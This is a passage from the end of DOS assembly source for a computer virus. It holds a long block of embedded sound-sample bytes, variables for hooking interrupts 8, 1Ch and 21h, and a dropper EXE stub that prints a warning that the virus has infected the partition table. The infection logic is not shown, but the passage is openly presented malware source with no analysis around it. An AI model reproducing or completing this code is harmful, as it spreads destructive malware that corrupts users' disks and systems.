		db	03ch,0c8h,0c8h,0fah,037h,023h,0d0h,09ch,00eh,0c2h,0f0h,066h,04bh,0c1h,0d9h,01bh
		db	026h,064h,0cch,09bh,007h,033h,06ch,01ch,099h,0e0h,072h,065h,083h,089h,01dh,00eh
		db	024h,064h,078h,0b1h,091h,0e6h,0cch,08fh,012h,032h,038h,049h,090h,0f3h,066h,047h
		db	08dh,019h,01eh,034h,04ch,0d9h,0b3h,033h,0e6h,0cch,0c9h,019h,062h,06ch,06dh,099h
		db	0b1h,0b6h,066h,0c6h,0f8h,09bh,01dh,0c8h,0fch,033h,033h,0b1h,0ech,0cdh,0cdh,099h
		db	03ah,037h,064h,0e8h,0e7h,083h,0c1h,0cfh,007h,087h,0ddh,01fh,00fh,032h,03eh,01eh
		db	074h,07ch,07ch,0e0h,0f8h,0f9h,0c1h,0f9h,077h,043h,0e9h,0fbh,083h,0e0h,0e5h,087h
		db	082h,099h,00fh,016h,073h,023h,001h,0f1h,013h,002h,032h,006h,002h,0f2h,066h,0c0h
		db	0e2h,062h,046h,066h,00eh,00ch,0e6h,026h,040h,0e4h,07ch,000h,0e2h,06ch,001h,0c2h
		db	022h,062h,0e6h,00ch,040h,036h,01eh,002h,0e2h,036h,020h,0f2h,03ch,038h,0f3h,036h
		db	060h,0d3h,013h,042h,07bh,01bh,001h,0f9h,03fh,02ch,0f9h,01bh,0b0h,079h,091h,0b1h
		db	0f9h,01fh,083h,0f9h,09fh,003h,0fdh,09dh,09bh,0bch,0ddh,0dbh,0fch,0ddh,09bh,0fch
		db	0ech,069h,0fch,0dch,0fdh,09ch,0cch,0f9h,03eh,06ch,0bch,0bch,02eh,024h,0feh,066h
		db	034h,0deh,026h,036h,01eh,066h,066h,04eh,066h,02eh,04fh,017h,01fh,027h,033h,01fh
		db	00fh,09bh,01ah,04fh,099h,039h,027h,088h,0d8h,037h,098h,083h,007h,0cch,018h,012h
		db	04ch,01ch,006h,0a4h,036h,00eh,054h,01eh,01fh,01eh,00eh,007h,09eh,00eh,04eh,0ceh
		db	00fh,007h,087h,007h,087h,08fh,007h,003h,047h,007h,083h,0c3h,003h,083h,0e3h,081h
		db	081h,0c3h,0a3h,0e1h,0e3h,0c1h,0f1h,0f1h,0c0h,0e0h,0f9h,0c0h,0f0h,070h,0f0h,0f8h
		db	0f8h,0f0h,0f8h,07ch,0c0h,0d8h,018h,01ch,01ch,06ch,0fch,03fh,025h,0cch,04ch,00ch
		db	0ceh,06eh,03ch,0e2h,0e3h,0e3h,0e7h,0c7h,08ch,073h,032h,074h,0f0h,0f1h,0b2h,070h
		db	0f2h,078h,078h,078h,078h,078h,078h,038h,038h,03ch,03eh,01ch,03ch,01eh,01ch,01ch
		db	01eh,01fh,01eh,00fh,00eh,00eh,00fh,08fh,00fh,007h,087h,087h,043h,083h,0c3h,0c3h
		db	0c3h,0c3h,0c3h,0c3h,0c3h,0c1h,0e1h,0c3h,0e0h,0f0h,0e0h,0e0h,0f0h,0f0h,0e0h,0f0h
		db	070h,0f0h,0f8h,078h,070h,078h,070h,070h,03ch,03ch,038h,03ch,03ch,01ch,03ch,03ch
		db	01ch,01eh,01ch,09ch,01eh,01ch,01eh,01fh,01ch,00eh,01fh,01ch,00fh,01fh,01eh,00fh
		db	00fh,09fh,007h,00fh,0c7h,007h,00fh,087h,017h,087h,087h,087h,0c7h,093h,087h,0c3h
		db	0d3h,083h,0c3h,0d1h,0c3h,0e1h,0f9h,0c3h,0e1h,0e8h,0c7h,0e0h,0f8h,0e3h,0f8h,0f6h
		db	0e3h,0e8h,07eh,0e3h,0e8h,07eh,063h,0e4h,0f9h,0e3h,0e2h,0dbh,0e1h,0e1h,0c8h,0e0h
		db	070h,0cdh,0f0h,0f0h,0cch,0f1h,0f8h,0c1h,0f0h,0f0h,0f1h,038h,038h,073h,038h,03ch
		db	073h,038h,03ch,038h,01ch,01eh,03ah,01eh,01eh,03ch,08eh,01eh,01ch,08eh,00fh,01fh
		db	08eh,00fh,01fh,00eh,00fh,01eh,006h,007h,00eh,007h,04eh,049h,0e2h,036h,00dh,0e6h
		db	028h,0c1h,0f3h,006h,004h,0b3h,007h,001h,0a9h,00fh,083h,095h,007h,087h,0c7h,083h
		db	081h,0e7h,083h,093h,0b3h,083h,0c1h,0e1h,0c1h,0e1h,0e3h,0c1h,0c0h,0d1h,0c1h,0e0h
		db	0f0h,0c0h,0e0h,0f8h,0e0h,060h,070h,0e8h,0f8h,078h,0f0h,07ch,07ch,070h,038h,03eh
		db	070h,03ch,01ch,03ch,03eh,03eh,03ch,03eh,01fh,030h,036h,006h,007h,007h,01bh,03fh
		db	00fh,0c9h,073h,013h,003h,0b3h,09bh,08fh,038h,0bch,0f8h,0f9h,0f1h,0e3h,01ch,0cch
		db	09dh,03ch,03ch,06ch,09ch,03ch,09eh,01eh,01eh,01eh,01eh,01eh,00eh,00eh,00fh,00fh
		db	087h,00fh,007h,087h,007h,007h,087h,0c7h,083h,0c3h,083h,083h,0e3h,0c3h,0c1h,0e1h
		db	0f1h,0d1h,0e0h,0f0h,0f0h,0f0h,0f0h,0f0h,0f0h,0f0h,0f0h,078h,070h,0f8h,03ch,038h
		db	038h,03ch,03ch,038h,03ch,01ch,03ch,03eh,01eh,01ch,03eh,01ch,01ch,00fh,00fh,00eh
		db	00fh,00fh,007h,00fh,00fh,007h,007h,087h,027h,007h,087h,007h,087h,0c7h,003h,087h
		db	0c7h,003h,0c7h,0c7h,083h,0c3h,0e7h,0c1h,0c3h,0f1h,0c1h,0c3h,0e1h,0c5h,0e1h,0e1h
		db	0e1h,0f1h,0ech,0e1h,0f0h,0f4h,0e0h,0f0h,0f4h,070h,0f8h,07eh,070h,0f8h,07ah,031h
		db	0f8h,03eh,038h,0feh,03dh,0b8h,0fah,01fh,0b8h,0fah,01fh,098h,0f9h,03eh,078h,0f8h
		db	0b6h,0f8h,0f8h,072h,038h,01ch,033h,07ch,03ch,033h,03ch,07eh,038h,07ch,03eh,03ch
		db	04eh,00eh,01ch,0ceh,00fh,01ch,0ceh,00fh,00eh,007h,007h,08eh,087h,087h,08fh,063h
		db	087h,087h,023h,083h,0c7h,0e3h,083h,0c7h,0c3h,083h,0c7h,081h,081h,0c0h,0f9h,09bh
		db	093h,079h,08dh,083h,079h,08bh,030h,07ch,0c9h,0c3h,02ch,0c1h,0c0h,07ah,043h,0e0h
		db	0e5h,041h,0e1h,0f1h,0e0h,0e0h,0f9h,0e0h,0e4h,0ech,0e0h,0f0h,078h,070h,078h,078h
		db	0f0h,070h,034h,070h,078h,03ch,030h,038h,03eh  ; ,038h

SampleEnd	equ	this byte

; Variables

Active		db	-1
ActiveYear	dw	-1
ActiveDate	dw	-1

OldInt8		equ	this dword		; orginal interrupt 8
OldInt8o	dw	-1
OldInt8s	dw	-1
OldInt1C	equ	this dword		; orginal interrupt 1ch
OldInt1Co	dw	-1
OldInt1Cs	dw	-1
OldInt21	equ	this dword		; orginal interrupt 21h
OldInt21o	dw	-1
OldInt21s	dw	-1

Count		dw	-1			; timer count
SampleOffset	dw	-1			; Used to make sound
SampleBit	db	-1
SampleFlag	db	-1
Handle		dw	8 dup(-1)		; Filehandles

cseg ends

; Orginal EXE-file

mseg segment public 'code'
		assume	cs:mseg, ds:mseg, es:mseg

		db	'MZ'			; header
		dw	PrgSize			; PartPage
		dw	1			; PageCount
		dw	0			; relocation items = 0
		dw	0			; headersize = 0h
		dw	80h			; minimum memory
		dw	0ffffh			; maximum memory
		dw	(PrgSize+15)/10h	; ss
		dw	7feh			; sp
		dw	0			; chksum
		dw	offset Orginal		; ip
		dw	0			; cs
		dw	1ch			; offset relocation table
		dw	0			; overlay number

Orginal:	mov	ah,9			; display warning
		push	cs
		pop	ds
		mov	dx,offset Warning
		int	21h
		mov	ax,4c00h
		int	21h			; terminate

Warning		db	13,10
		db	'WARNING:',13,10
		db	13,10
		db	'Yeah virus has now infected the partition table !!!!!',13,10
		db	13,10
		db	'$'

mseg ends

sseg segment stack 'stack'
		db	800h dup(?)
sseg ends

end Main

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